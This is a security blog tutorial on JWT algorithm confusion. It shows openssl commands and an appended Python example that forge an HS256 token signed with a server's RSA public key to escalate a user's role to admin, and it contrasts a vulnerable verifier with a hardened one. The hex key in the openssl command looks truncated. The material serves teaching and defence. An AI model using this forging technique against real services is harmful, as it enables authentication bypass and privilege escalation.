Vulnérabilité dans les tokens JWT (Vulnerability in JWT tokens)
Sécuriser votre site, by Germain, 2021-07-28
https://www.searchevolution.com/security/2021/07/28/vulnerabilite-dans-les-tokens-jwt/

Structure of a token: header.payload.signature
The three sections are base64url-encoded. The third section is the signature, not a secret: it is computed over the first two.

Structure of a header:
{"typ":"JWT","alg":"RS256"}

If we have the server's public key, we can re-sign the token ourselves. This works when the server's verification code lets the token header choose the algorithm and hands its configured RSA public key to whichever algorithm is named: the asymmetric RS256 is swapped for the symmetric HS256, and the public key, which is not secret, becomes the HMAC key. A server that pins the expected algorithm in its own configuration, and never derives it from the token, is not affected.

- Change the algorithm in the header to HS256 (HS256 is symmetric, RS256 is asymmetric).

- Convert the server's public key "a.pem" to hexadecimal for use with openssl in the next step:
cat a.pem | xxd -p | tr -d "\n"

- Generate an HMAC signature over the edited token (the first two sections, header.payload) with the key produced above:
echo -n "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IjIzIiwidXNlcm5hbWUiOiJ2aXNpdG9yIiwicm9sZSI6IjEifQ" | openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e20505592d2d2d2d2d0a
(stdin)= 8f421b351eb61ff226df88d526a7e9b9bb7b8239688c1f862f261a0c588910e0

In this example the header decodes to {"typ":"JWT","alg":"HS256"} and the payload to {"id":"23","username":"visitor","role":"1"}; the payload is what the attacker edits before signing.

- Convert the signature
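The procedure above, carried through end to end in Python as an added example (this is not the article's code). It uses only the standard library: the server's public key is a constructed PEM-looking byte string, because the attack uses the file bytes verbatim as the HMAC secret and never performs RSA. The verifier's algorithm table therefore registers only HS256 (a real server would also register RS256); the bug demonstrated by vulnerable_verify, letting the token header pick the algorithm, does not depend on that entry. hardened_verify shows the fix: the algorithm is server configuration, so a token claiming HS256 against an RS256 deployment is rejected before any key is touched. Names, the sample payload and the shared secret are all constructed for this example.

```python
import base64
import hashlib
import hmac
import json
from typing import Callable, Dict, Optional

# Constructed stand-in for the server's public key file ("a.pem" in the article).
# The attack keys HMAC with the raw file bytes, so the content need not be a
# valid RSA key for this demonstration.
SERVER_PUBLIC_KEY_PEM = (
    b"-----BEGIN PUBLIC KEY-----\n"
    b"MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKconstructedKeyMaterialForIllustration\n"
    b"-----END PUBLIC KEY-----\n"
)


def b64url_encode(data: bytes) -> str:
    """Base64url without '=' padding, as JWS requires (RFC 7515)."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Inverse of b64url_encode: restore the padding, then decode."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def pem_to_hexkey(pem: bytes) -> str:
    """Same output as `cat a.pem | xxd -p | tr -d "\\n"`, i.e. the value passed
    to `openssl dgst -sha256 -mac HMAC -macopt hexkey:...` in the article."""
    return pem.hex()


def forge_hs256_token(hexkey: str, payload: dict) -> str:
    """Attacker side: build header.payload with alg switched to HS256 and sign
    it with HMAC-SHA256 keyed by the server's public key bytes (given as hex)."""
    header = {"typ": "JWT", "alg": "HS256"}
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    digest = hmac.new(bytes.fromhex(hexkey), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(digest)


def _hs256_check(key: bytes, signing_input: bytes, signature: bytes) -> bool:
    """Constant-time HMAC-SHA256 comparison for the HS256 path."""
    return hmac.compare_digest(hmac.new(key, signing_input, hashlib.sha256).digest(), signature)


# Algorithms the server knows how to verify. A real deployment would also
# register RS256 here (left out: the standard library has no RSA). The flaw in
# vulnerable_verify is the dispatch on the header, not the table's contents.
ALGORITHMS: Dict[str, Callable[[bytes, bytes, bytes], bool]] = {"HS256": _hs256_check}


def _split(token: str):
    """Return (header dict, signing input bytes, raw signature, payload segment)."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    return header, (header_b64 + "." + payload_b64).encode(), b64url_decode(sig_b64), payload_b64


def vulnerable_verify(token: str, key: bytes) -> Optional[dict]:
    """Broken server: lets the token header pick the algorithm, then feeds its
    single configured key (the RSA public key) to whatever was picked."""
    header, signing_input, signature, payload_b64 = _split(token)
    check = ALGORITHMS.get(header.get("alg"))
    if check is None or not check(key, signing_input, signature):
        return None
    return json.loads(b64url_decode(payload_b64))


def hardened_verify(token: str, key: bytes, expected_alg: str) -> Optional[dict]:
    """Fixed server: the algorithm comes from configuration. A token naming any
    other alg is rejected before the key is used for anything."""
    header, signing_input, signature, payload_b64 = _split(token)
    if header.get("alg") != expected_alg:
        return None
    check = ALGORITHMS.get(expected_alg)
    if check is None or not check(key, signing_input, signature):
        return None
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    forged = forge_hs256_token(pem_to_hexkey(SERVER_PUBLIC_KEY_PEM),
                               {"id": "23", "username": "visitor", "role": "admin"})
    print("vulnerable server accepts:", vulnerable_verify(forged, SERVER_PUBLIC_KEY_PEM))
    print("hardened RS256 server accepts:", hardened_verify(forged, SERVER_PUBLIC_KEY_PEM, "RS256"))
```

The same forge_hs256_token function is also what a legitimate HS256 issuer would run with a real shared secret, which is the point: nothing in the token distinguishes "HMAC with a secret" from "HMAC with a public key file". Only the verifier's refusal to let the token choose the algorithm closes the hole.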